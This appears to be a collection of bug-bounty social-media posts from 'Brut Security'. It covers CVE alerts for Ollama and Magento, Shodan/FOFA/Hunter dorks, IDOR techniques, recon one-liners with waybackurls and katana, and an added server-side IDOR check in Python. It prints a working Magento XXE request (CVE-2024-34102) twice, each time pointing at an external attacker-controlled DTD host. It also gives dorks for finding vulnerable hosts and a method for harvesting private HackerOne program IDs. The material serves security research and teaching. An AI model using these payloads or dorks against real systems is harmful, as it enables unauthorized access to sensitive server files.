Looking for someone who can contribute to the next 30-day Bug Bounty Challenge.
Similar to this: https://nas.io/brutsecurity
🚨CVE-2024-37032: Probllama—Ollama Remote Code Execution Vulnerability
⚠️The issue is a case of insufficient input validation that results in a path traversal flaw. An attacker could exploit it to overwrite arbitrary files on the server, ultimately leading to remote code execution.
🔥PoC: https://lnkd.in/gk6Wvq_P
💥Dorks:
Hunter: /product.name="Ollama Web"
FOFA: app="Ollama-Web"
CVE-2024-34102 POC
POST /rest/V1/guest-carts/1/estimate-shipping-methods HTTP/2
{"address":{"totalsCollector":{"collectorList":{"totalCollector":{"sourceData":{"data":"http://attacker*com/xxe.xml","dataIsURL":true,"options":1337}}}}}}
IDOR on HackerOne Embedded Submission Form 💰 💲
-
Steps to reproduce (obtaining inactive UUID of many private programs)
1- Use this command: echo 'https://hackerone.com/' | waybackurls > lists.txt (make sure you have waybackurls installed on your attack box)
2- cat lists.txt | grep "embedded_submissions" > results.txt
3- cat results.txt
4- You will find a lot of embedded submission IDs of many random private programs; you can check them by browsing each URL
-
https://lnkd.in/drCHC6qA
-
By @japzdivino
https://x.com/japzdivino
China now has its own GitHub-like public Git repository hosting service called GitCode; it is owned and operated by CSDN under the company name "重庆开源共创科技有限公司".
It is being reported that many users' repositories are being cloned and re-hosted on GitCode without authorization, meaning your project may very well be on this service without you explicitly allowing it.
tldr: GitCode or China is attempting to mirror/clone the entire GitHub over to their own servers and there's nothing you can do about it, even if your license somehow disagrees with it.
Credit: https://x.com/azakasekai_/status/1805844941438075163?s=46&t=GxBcd0lJbjtL_W3TmBw-tA
#github #gitcode
Brut Security
Looking for someone who can contribute to the next 30-day Bug Bounty Challenge. Similar to this: https://nas.io/brutsecurity
Day 1: Run Subfinder
Day 2: Scrape JS
Day 3: Report, etc., till day 30.
Brut Security pinned «💥 Join Our Bugbounty Discussion Group 💥 🔥 https://news.1rj.ru/str/brutsec🔥 🤖 https://discord.gg/GZBsQMY6🤖 »
⚔️Pentest-Windows
🔰Windows11 Penetration Suite Toolkit
📌A Windows penetration testing environment that works out of the box.
⚠️This project was created for educational purposes and should not be used in environments without legal authorization.
🔗Link: https://lnkd.in/gtX3GbR8
🔖#infosec #cybersecurity #hacking #pentesting #security #infosec #cybersecurity #hacking #pentesting #security #oscp #ceh #nmap #infosec #hackingtools #networksecurity
📢You can now passively enumerate all endpoints of a website with katana (no need for waybackurls).
📝Example:
echo nasa.gov | katana -passive -f qurl -pss waybackarchive,commoncrawl,alienvault | tee endpoints
🚨You can then check the status of these endpoints or filter in order to find new vulnerabilities:
⚠Example:
echo nasa.gov | katana -passive -f qurl -pss waybackarchive,commoncrawl,alienvault | httpx -mc 200 | grep -E '\.(js|php)$' | tee specificEndpoints
💪🏻Scan for Adobe Commerce & Magento - XXE
(CVE-2024-34102) discovered by Sergey Temnikov using Nuclei Template @pdnuclei
🔍 Details: https://lnkd.in/dBy32DtY
📑 Nuclei Template: https://lnkd.in/dUNFMUny
🔧 GitHub PR: https://lnkd.in/dqu65C5i
#bugbounty #adobe #pdteam #infos
Advanced IDORs - 9 Techniques by Intigriti:
1. Exploiting Basic IDORs
How to: Modify a predictable numeric ID in the request URL or parameters.
Example: GET /user/email?userId=1002 (change userId to another value).
2. Exploiting IDORs via Parameter Pollution
How to: Inject multiple instances of the same parameter in the request.
Example: POST /update_profile with user_id=1234&user_id=5678.
3. Exploiting IDORs via JSON Globbing
How to: Manipulate JSON fields with arrays, booleans, wildcards, or large integers.
Example: { "user_id": ["1234", "5678"] } or { "user_id": "*" }.
4. Exploiting Method-Based IDORs
How to: Change the HTTP method to bypass access controls.
Example: Change GET /user/data to POST /user/data.
5. Exploiting Content-Type-Based IDORs
How to: Alter the Content-Type header to manipulate request processing.
Example: Use Content-Type: application/json instead of Content-Type: text/plain.
6. Exploiting IDORs via Deprecated API Versions
How to: Use older API versions that may lack updated security checks.
Example: Access /v1/user/data instead of /v2/user/data.
7. Exploiting IDORs in APIs that Use Static Keywords
How to: Replace keywords like current or me with numerical user IDs.
Example: Change /user/profile/current to /user/profile/1002.
8. Exploiting IDORs that Require Unpredictable IDs
How to: Find references to UUIDs or hashes in other parts of the application.
Example: Extract UUID from profile URLs like /profile/123e4567-e89b-12d3-a456-426614174000.
9. Exploiting Second-Order IDOR Vulnerabilities
How to: Manipulate stored IDs used in subsequent processes.
Example: Submit a form that stores your ID, then trigger an export process that retrieves data using that stored ID.
----------------------------------------------------------
I've never seen real-world examples for some of them, but they are definitely worth a try.
#pentesting #appsec #bugbounty #cybersecurity
Here's the full scoop: https://buff.ly/3zfhhzL
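As an added example (not part of the Intigriti post or its write-up), a server-side check in Python that closes the request-side variants listed above: it resolves exactly one integer user_id from the query string or JSON body, rejects duplicate parameters, arrays, wildcards, booleans and oversized integers, maps the static keywords me/current to the session user, and applies the same ownership check regardless of HTTP method or Content-Type. The Request shape, the user_id parameter name and the admin override are assumptions.

```python
# Added example (not from the original post): a request-side object-reference
# guard. The Request shape and the "user_id" parameter name are assumptions.
from dataclasses import dataclass
from typing import Optional
from urllib.parse import parse_qsl

ALIASES = {"me", "current", "self"}   # static keywords meaning "the caller"
MAX_ID = 2**31 - 1                    # upper bound matching a 32-bit id column


@dataclass
class Request:
    method: str
    path: str
    query: str = ""               # raw query string, e.g. "user_id=1234&user_id=5678"
    json: Optional[dict] = None   # parsed JSON body, if any
    user_id: int = 0              # authenticated caller, taken from the session


def resolve_target(req: Request) -> int:
    """Return the single integer id the request refers to, or raise ValueError.
    Rejects parameter pollution (repeated key) and JSON globbing (arrays, booleans,
    wildcards, out-of-range ints); maps 'me'/'current' to the session user."""
    pairs = parse_qsl(req.query, keep_blank_values=True)
    values = [v for k, v in pairs if k == "user_id"]
    if len(values) > 1:
        raise ValueError("duplicate user_id parameter")
    if req.json is not None and "user_id" in req.json:
        values.append(req.json["user_id"])
    if len(values) != 1:
        raise ValueError("exactly one user_id expected")
    v = values[0]
    if isinstance(v, str) and v in ALIASES:
        return req.user_id
    if isinstance(v, str) and v.isdecimal():
        v = int(v)
    if isinstance(v, bool) or not isinstance(v, int):
        raise ValueError("user_id must be an integer")
    if not 0 < v <= MAX_ID:
        raise ValueError("user_id out of range")
    return v


def authorize(req: Request, admin_ids: frozenset = frozenset()) -> bool:
    """Ownership check applied identically to every method and content type,
    so switching GET->POST or JSON->text cannot bypass it."""
    try:
        target = resolve_target(req)
    except ValueError:
        return False
    return target == req.user_id or req.user_id in admin_ids
```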
🔹 Web Scanner & Crawler
🔹Fuzzing with Intruder (Part3)
🔹Fuzzing with Intruder (Part2)
🔹Fuzzing with Intruder (Part1)
🔹XSS Validator
🔹Configuring Proxy
🔹Burp Collaborator
🔹HackBar
🔹Burp Sequencer
🔹Turbo Intruder
🔹Engagement Tools
🔹Payload Processing Rule (Part2)
🔹Payload Processing Rule (Part1)
🔹Beginners Guide to Burpsuite Payloads (Part2)
🔹Beginners Guide to Burpsuite Payloads (Part1)
🔹Encoder & Decoder Tutorial
🔹Active Scan++
🔹Software Vulnerability Scanner
🔹Burp’s Project Management
🔹Repeater
🚨Magento XXE CVE-2024-34102: A newly discovered vulnerability
dubbed “CosmicSting” jeopardizes millions of online stores
built on Adobe Commerce and Magento platforms.
⚠CosmicSting enables attackers to gain unauthorized access
to sensitive files, including those containing passwords.
When combined with a recent Linux bug (CVE-2024-2961),
the vulnerability can be escalated to remote code execution.
Hunter: http://product.name="Adobe Magento"
FOFA: app="Adobe-Magento"
SHODAN: http.html:"magento-template"
POST /rest/V1/guest-carts/1/estimate-shipping-methods HTTP/2
Content-Type: application/json
Content-Length: 192

{"address":{"totalsCollector":{"collectorList":{"totalCollector":{"sourceData":{"data":"http://*.oastify.com/xxe.xml","dataIsURL":true,"options":12345678}}}}}}
YouTube
🚨Unauthenticated Magento XXE | CVE-2024-34102 | Bug Bounty POC | Brut Security
#bugbounty #bugbountytips
Whoever is commenting that it doesn't work on the latest updates of Firefox, the video is for them only. No offence to anyone, but you guys lack a lot of research!